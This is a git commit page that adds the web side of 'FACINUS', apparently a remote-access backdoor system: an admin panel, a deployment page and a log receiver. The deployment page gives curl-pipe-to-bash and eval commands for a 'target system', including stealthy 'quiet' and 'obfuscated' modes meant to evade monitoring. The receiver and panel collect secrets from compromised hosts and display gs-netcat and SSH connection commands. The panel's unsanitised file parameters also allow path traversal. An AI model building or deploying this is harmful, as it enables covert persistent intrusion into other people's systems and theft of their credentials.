elleoma/facinus
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update web

Browse Source
This commit is contained in:
Amoelle
2025-04-05 00:14:27 +03:00
parent 7fed9abbbd
commit 143851e3d7
3 changed files with 468 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

275
admin.php Normal file
View File

@@ -0,0 +1,275 @@
<?php
// FACINUS Admin Panel
// This file allows viewing logs and connection information from deployed clients
// Session and authentication
session_start();
$admin_password = "ADMIN_PASSWORD_PLACEHOLDER"; // Will be replaced during installation
// Handle login
if (isset($_POST['password'])) {
if ($_POST['password'] === $admin_password) {
$_SESSION['authenticated'] = true;
} else {
$login_error = "Invalid password";
}
}
// Handle logout
if (isset($_GET['logout'])) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// Check authentication
$authenticated = isset($_SESSION['authenticated']) && $_SESSION['authenticated'] === true;
// Directories
$logs_dir = __DIR__ . "/logs";
$secrets_dir = __DIR__ . "/secrets";
// Get list of hosts (each subdirectory in logs_dir is a host)
$hosts = [];
if ($authenticated && is_dir($logs_dir)) {
$dir_content = scandir($logs_dir);
foreach ($dir_content as $item) {
if ($item != "." && $item != ".." && is_dir($logs_dir . "/" . $item)) {
$hosts[] = $item;
}
}
}
// View specific log if requested
$current_log = null;
$log_content = "";
if ($authenticated && isset($_GET['log'])) {
$log_path = $logs_dir . "/" . $_GET['host'] . "/" . $_GET['log'];
if (file_exists($log_path) && is_file($log_path)) {
$current_log = $_GET['log'];
$log_content = file_get_contents($log_path);
}
}
// View system info if requested
$system_info = null;
if ($authenticated && isset($_GET['info']) && $_GET['info'] === 'system') {
$info_path = $logs_dir . "/" . $_GET['host'] . "/system_info.json";
if (file_exists($info_path) && is_file($info_path)) {
$system_info = json_decode(file_get_contents($info_path), true);
}
}
// View secrets if requested
$secrets = [];
if ($authenticated && isset($_GET['secrets']) && $_GET['host']) {
$host_secrets_dir = $secrets_dir . "/" . $_GET['host'];
if (is_dir($host_secrets_dir)) {
$secret_files = scandir($host_secrets_dir);
foreach ($secret_files as $file) {
if ($file != "." && $file != ".." && is_file($host_secrets_dir . "/" . $file)) {
$type = pathinfo($file, PATHINFO_FILENAME);
$value = file_get_contents($host_secrets_dir . "/" . $file);
$secrets[$type] = $value;
}
}
}
}
// Get logs for a specific host if requested
$host_logs = [];
if ($authenticated && isset($_GET['host'])) {
$host_logs_dir = $logs_dir . "/" . $_GET['host'];
if (is_dir($host_logs_dir)) {
$log_files = scandir($host_logs_dir);
foreach ($log_files as $file) {
if ($file != "." && $file != ".." && is_file($host_logs_dir . "/" . $file)) {
$host_logs[] = $file;
}
}
}
// Sort logs by most recent first
usort($host_logs, function($a, $b) {
return filemtime($logs_dir . "/" . $_GET['host'] . "/" . $b) -
filemtime($logs_dir . "/" . $_GET['host'] . "/" . $a);
});
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>FACINUS - Admin Panel</title>
<style>
body { font-family: Arial, sans-serif; margin: 0; padding: 0; }
.container { max-width: 1200px; margin: 0 auto; padding: 20px; }
.header { background: #333; color: white; padding: 10px; }
.header h1 { margin: 0; }
.logout { float: right; color: white; text-decoration: none; }
.sidebar { width: 250px; float: left; }
.content { margin-left: 270px; }
.card { border: 1px solid #ddd; border-radius: 5px; padding: 15px; margin-bottom: 20px; }
.login { max-width: 400px; margin: 50px auto; border: 1px solid #ddd; padding: 20px; border-radius: 5px; }
.form-group { margin-bottom: 15px; }
input[type="password"] { width: 100%; padding: 8px; box-sizing: border-box; }
button { background: #0275d8; color: white; border: none; padding: 10px 15px; cursor: pointer; }
.host-list { list-style: none; padding: 0; }
.host-list li { padding: 8px; border-bottom: 1px solid #eee; }
.host-list li:hover { background: #f5f5f5; }
.host-list a { text-decoration: none; color: #333; display: block; }
.log-list { list-style: none; padding: 0; }
.log-list li { padding: 8px; border-bottom: 1px solid #eee; }
.log-list a { text-decoration: none; color: #333; }
.tabs { margin-bottom: 20px; }
.tab { display: inline-block; padding: 10px 15px; cursor: pointer; border: 1px solid #ddd; }
.tab.active { background: #007bff; color: white; }
.logs { background: #f8f8f8; padding: 15px; border: 1px solid #ddd; overflow: auto; max-height: 600px; font-family: monospace; white-space: pre-wrap; }
.secret { background: #ffffd8; padding: 15px; border: 1px solid #e6e6a3; margin-bottom: 10px; font-family: monospace; }
.secret-title { font-weight: bold; margin-bottom: 5px; }
.alert { padding: 15px; margin-bottom: 20px; border: 1px solid transparent; border-radius: 4px; }
.alert-danger { color: #721c24; background-color: #f8d7da; border-color: #f5c6cb; }
.command { background: #f8f8f8; padding: 10px; border: 1px solid #ddd; font-family: monospace; margin: 10px 0; }
</style>
</head>
<body>
<div class="header">
<div class="container">
<h1>FACINUS Admin Panel</h1>
<?php if ($authenticated): ?>
<a href="?logout=1" class="logout">Logout</a>
<?php endif; ?>
</div>
</div>
<div class="container">
<?php if (!$authenticated): ?>
<div class="login">
<h2>Login</h2>
<?php if (isset($login_error)): ?>
<div class="alert alert-danger"><?php echo $login_error; ?></div>
<?php endif; ?>
<form method="post">
<div class="form-group">
<label for="password">Admin Password</label>
<input type="password" id="password" name="password" required>
</div>
<button type="submit">Login</button>
</form>
</div>
<?php else: ?>
<div class="sidebar">
<div class="card">
<h3>Hosts</h3>
<?php if (empty($hosts)): ?>
<p>No hosts found.</p>
<?php else: ?>
<ul class="host-list">
<?php foreach ($hosts as $host): ?>
<li><a href="?host=<?php echo urlencode($host); ?>"><?php echo htmlspecialchars($host); ?></a></li>
<?php endforeach; ?>
</ul>
<?php endif; ?>
</div>
</div>
<div class="content">
<?php if (isset($_GET['host'])): ?>
<div class="card">
<h2>Host: <?php echo htmlspecialchars($_GET['host']); ?></h2>
<div class="tabs">
<a href="?host=<?php echo urlencode($_GET['host']); ?>" class="tab <?php echo (!isset($_GET['secrets']) && !isset($_GET['info'])) ? 'active' : ''; ?>">Logs</a>
<a href="?host=<?php echo urlencode($_GET['host']); ?>&secrets=1" class="tab <?php echo isset($_GET['secrets']) ? 'active' : ''; ?>">Access Info</a>
<a href="?host=<?php echo urlencode($_GET['host']); ?>&info=system" class="tab <?php echo isset($_GET['info']) ? 'active' : ''; ?>">System Info</a>
</div>
<?php if (isset($_GET['secrets'])): ?>
<h3>Connection Information</h3>
<?php if (empty($secrets)): ?>
<p>No connection information available.</p>
<?php else: ?>
<?php foreach ($secrets as $type => $value): ?>
<div class="secret">
<div class="secret-title"><?php echo ucfirst(htmlspecialchars($type)); ?>:</div>
<?php if ($type === "gsocket_secret"): ?>
<p>Secret: <code><?php echo htmlspecialchars($value); ?></code></p>
<p>Connect using: <div class="command">gs-netcat -s <?php echo htmlspecialchars($value); ?></div></p>
<?php elseif ($type === "ssh_config"): ?>
<?php $ssh_config = json_decode($value, true); ?>
<p>SSH Port: <code><?php echo $ssh_config['port']; ?></code></p>
<p>Connect using: <div class="command">ssh user@<?php echo $_GET['host']; ?> -p <?php echo $ssh_config['port']; ?></div></p>
<?php elseif ($type === "ssh_key"): ?>
<p>SSH Public Key:</p>
<pre><?php echo htmlspecialchars($value); ?></pre>
<?php elseif ($type === "wol_config"): ?>
<?php $wol_config = json_decode($value, true); ?>
<p>Interface: <code><?php echo $wol_config['interface']; ?></code></p>
<p>MAC Address: <code><?php echo $wol_config['mac']; ?></code></p>
<p>Wake using: <div class="command">wakeonlan <?php echo $wol_config['mac']; ?></div></p>
<?php else: ?>
<pre><?php echo htmlspecialchars($value); ?></pre>
<?php endif; ?>
</div>
<?php endforeach; ?>
<?php endif; ?>
<?php elseif (isset($_GET['info']) && $_GET['info'] === 'system'): ?>
<h3>System Information</h3>
<?php if ($system_info): ?>
<div class="logs">
<?php foreach ($system_info as $key => $value): ?>
<?php if (is_array($value)): ?>
<strong><?php echo ucfirst(htmlspecialchars($key)); ?>:</strong>
<ul>
<?php foreach ($value as $item): ?>
<li>
<?php
if (is_array($item)) {
foreach ($item as $k => $v) {
echo htmlspecialchars($k) . ": " . htmlspecialchars($v) . " ";
}
} else {
echo htmlspecialchars($item);
}
?>
</li>
<?php endforeach; ?>
</ul>
<?php else: ?>
<strong><?php echo ucfirst(htmlspecialchars($key)); ?>:</strong> <?php echo htmlspecialchars($value); ?><br>
<?php endif; ?>
<?php endforeach; ?>
</div>
<?php else: ?>
<p>No system information available.</p>
<?php endif; ?>
<?php else: ?>
<h3>Available Logs</h3>
<?php if (empty($host_logs)): ?>
<p>No logs available.</p>
<?php else: ?>
<ul class="log-list">
<?php foreach ($host_logs as $log): ?>
<li><a href="?host=<?php echo urlencode($_GET['host']); ?>&log=<?php echo urlencode($log); ?>"><?php echo htmlspecialchars($log); ?></a></li>
<?php endforeach; ?>
</ul>
<?php if ($current_log): ?>
<h3>Log: <?php echo htmlspecialchars($current_log); ?></h3>
<div class="logs"><?php echo htmlspecialchars($log_content); ?></div>
<?php endif; ?>
<?php endif; ?>
<?php endif; ?>
</div>
<?php else: ?>
<div class="card">
<h2>Welcome to FACINUS Admin Panel</h2>
<p>Select a host from the sidebar to view logs and connection information.</p>
</div>
<?php endif; ?>
</div>
<?php endif; ?>
</div>
</body>
</html>

105
index.html Normal file
View File

@@ -0,0 +1,105 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>FACINUS Deployment</title>
<style>
body { font-family: Arial, sans-serif; margin: 0; padding: 0; }
.container { max-width: 800px; margin: 0 auto; padding: 20px; }
.header { background: #333; color: white; padding: 10px; }
.header h1 { margin: 0; }
.card { border: 1px solid #ddd; border-radius: 5px; padding: 20px; margin-bottom: 20px; }
.command { background: #f8f8f8; padding: 15px; border: 1px solid #ddd; font-family: monospace; margin: 15px 0; position: relative; }
.copy-btn { position: absolute; right: 10px; top: 10px; background: #007bff; color: white; border: none; padding: 5px 10px; cursor: pointer; }
.options { margin-top: 20px; }
.option-box { border: 1px solid #ddd; padding: 10px; margin-bottom: 10px; border-radius: 5px; }
.option-title { font-weight: bold; margin-bottom: 5px; }
</style>
</head>
<body>
<div class="header">
<div class="container">
<h1>FACINUS Deployment</h1>
</div>
</div>
<div class="container">
<div class="card">
<h2>Quick Setup</h2>
<p>Copy and paste this command into a terminal on the target system:</p>
<div class="command" id="cmd1">
eval "$(curl -fsSL http://SERVER_IP/deployment/y)"
<button class="copy-btn" onclick="copyToClipboard('cmd1')">Copy</button>
</div>
<p><strong>Note:</strong> This will install with default settings and requires root access.</p>
</div>
<div class="card">
<h2>Installation Options</h2>
<div class="options">
<div class="option-box">
<div class="option-title">Minimal Installation (No Root Required)</div>
<p>For limited access without requiring root privileges:</p>
<div class="command" id="cmd2">
curl -fsSL http://SERVER_IP/deployment/minimal | bash
<button class="copy-btn" onclick="copyToClipboard('cmd2')">Copy</button>
</div>
</div>
<div class="option-box">
<div class="option-title">Full Installation</div>
<p>Complete installation with all features:</p>
<div class="command" id="cmd3">
curl -fsSL http://SERVER_IP/deployment/full | sudo bash
<button class="copy-btn" onclick="copyToClipboard('cmd3')">Copy</button>
</div>
</div>
<div class="option-box">
<div class="option-title">Quiet Mode</div>
<p>Minimal output for stealthy installation:</p>
<div class="command" id="cmd4">
curl -fsSL http://SERVER_IP/deployment/quiet | sudo bash
<button class="copy-btn" onclick="copyToClipboard('cmd4')">Copy</button>
</div>
</div>
<div class="option-box">
<div class="option-title">Obfuscated Installation</div>
<p>For environments with stricter monitoring:</p>
<div class="command" id="cmd5">
eval "$(curl -fsSL http://SERVER_IP/deployment/x)"
<button class="copy-btn" onclick="copyToClipboard('cmd5')">Copy</button>
</div>
</div>
</div>
</div>
<div class="card">
<h2>Admin Access</h2>
<p>Access the admin panel for logs and client information:</p>
<p><a href="admin.php">Admin Panel</a></p>
</div>
</div>
<script>
function copyToClipboard(elementId) {
const el = document.getElementById(elementId);
const text = el.innerText.split('\n')[0].trim();
navigator.clipboard.writeText(text).then(function() {
const btn = el.querySelector('.copy-btn');
const originalText = btn.innerText;
btn.innerText = 'Copied!';
setTimeout(() => {
btn.innerText = originalText;
}, 2000);
});
}
</script>
</body>
</html>

88
log_receiver.php Normal file
View File

@@ -0,0 +1,88 @@
<?php
// Log receiver script for FACINUS remote access system
// This script receives logs from deployed clients and stores them securely
// Configuration
$auth_token = "TOKEN_PLACEHOLDER"; // Will be replaced during installation
$logs_dir = __DIR__ . "/logs";
$secrets_dir = __DIR__ . "/secrets";
// Verify authentication token
if (!isset($_POST['auth_token']) || $_POST['auth_token'] !== $auth_token) {
http_response_code(403);
die("Access denied");
}
// Get data from request
$hostname = isset($_POST['hostname']) ? filter_var($_POST['hostname'], FILTER_SANITIZE_STRING) : "unknown";
$timestamp = date('Y-m-d_H-i-s');
$system_info = isset($_POST['system_info']) ? $_POST['system_info'] : "{}";
$secret_type = isset($_POST['secret_type']) ? filter_var($_POST['secret_type'], FILTER_SANITIZE_STRING) : "unknown";
$secret_value = isset($_POST['secret_value']) ? $_POST['secret_value'] : "";
// Create hostname-specific directories if they don't exist
$host_logs_dir = $logs_dir . "/" . preg_replace('/[^a-zA-Z0-9_-]/', '_', $hostname);
if (!file_exists($host_logs_dir)) {
mkdir($host_logs_dir, 0750, true);
}
$host_secrets_dir = $secrets_dir . "/" . preg_replace('/[^a-zA-Z0-9_-]/', '_', $hostname);
if (!file_exists($host_secrets_dir)) {
mkdir($host_secrets_dir, 0750, true);
}
// Process the file upload if available
if (isset($_FILES['log_data']) && $_FILES['log_data']['error'] === UPLOAD_ERR_OK) {
$log_file = $host_logs_dir . "/" . $timestamp . "_" . sanitize_filename($_FILES['log_data']['name']) . ".log";
if (move_uploaded_file($_FILES['log_data']['tmp_name'], $log_file)) {
// Process system info if provided
if (!empty($system_info)) {
$info_file = $host_logs_dir . "/system_info.json";
file_put_contents($info_file, $system_info);
}
// Process secret if provided
if (!empty($secret_type) && !empty($secret_value)) {
$secret_file = $host_secrets_dir . "/" . sanitize_filename($secret_type) . ".txt";
file_put_contents($secret_file, $secret_value);
}
// Success response
http_response_code(200);
echo json_encode(['status' => 'success', 'message' => 'Log received']);
} else {
http_response_code(500);
echo json_encode(['status' => 'error', 'message' => 'Failed to save log file']);
}
} else {
// Handle case where no file was uploaded but maybe system info or secrets were sent
if (!empty($system_info)) {
$info_file = $host_logs_dir . "/system_info.json";
file_put_contents($info_file, $system_info);
}
if (!empty($secret_type) && !empty($secret_value)) {
$secret_file = $host_secrets_dir . "/" . sanitize_filename($secret_type) . ".txt";
file_put_contents($secret_file, $secret_value);
// Log this secret submission as well
$log_entry = date('Y-m-d H:i:s') . " - New {$secret_type} received\n";
file_put_contents($host_logs_dir . "/secrets_log.txt", $log_entry, FILE_APPEND);
}
// Response
if (!empty($system_info) || (!empty($secret_type) && !empty($secret_value))) {
http_response_code(200);
echo json_encode(['status' => 'success', 'message' => 'Data received']);
} else {
http_response_code(400);
echo json_encode(['status' => 'error', 'message' => 'No data received']);
}
}
// Helper function to sanitize filenames
function sanitize_filename($filename) {
// Remove any character that isn't a letter, number, dot, hyphen or underscore
return preg_replace('/[^a-zA-Z0-9._-]/', '_', $filename);
}
?>